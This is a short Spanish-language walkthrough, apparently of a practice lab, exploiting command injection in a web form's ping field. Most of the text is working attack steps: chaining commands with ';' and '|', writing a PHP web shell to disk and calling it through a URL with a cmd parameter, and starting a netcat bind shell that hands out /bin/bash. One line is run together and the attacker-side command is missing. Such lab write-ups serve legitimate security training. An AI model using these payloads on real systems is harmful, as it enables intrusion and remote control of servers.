En la casilla del ping, podemos hacer el ping obviamente, pero tambien podemos después de dar esa orden, añadir mas comandos con el ";" o "|" o bien haciendo el ping a "127.0.0.1 && echo hola" pero mostraría el ping que no es necesario, asi que mejor solo usar en la caja el punto y coma sin dirección y dejar volar la imaginación.
En mi caso, quiero tener una shell reverse, para lo cual ejecuto lo siguiente
; echo '<? system($_GET["cmd"]); ?>' > shell.php
Con lo cual consigo tener ese archivo en el path actual, que lo miramos de la siguiente forma:
; pwd
Ahora, sabiendo cual es el path, en la url del navegador ejecutar la shell de la siguiente manera:
http://ipservidor/path/obetenido/shell.php?cmd=whoami
y a partir de ese momento nos muestra la información mas limpia, además de poder ejecutar el netcat para tener una shell reverse mas comoda y a partir de ahí conseguir más cosas. Puede ver que más hacer en el artículo Upload.
En esta ocasión, tenemos el caracter "|" para poder hacer uso del ping, así que podríamos poner a ese servidor a la escucha en un puerto y conectarnos después desde la maquina atacante. Lo hacemos de esta forma:
| netcat -l -p 2222 -e /bin/bashY ahora desde un terminal atacante hacermos:
Y ya estamos conectados con una mejor shell.
Sin resolver por el momento.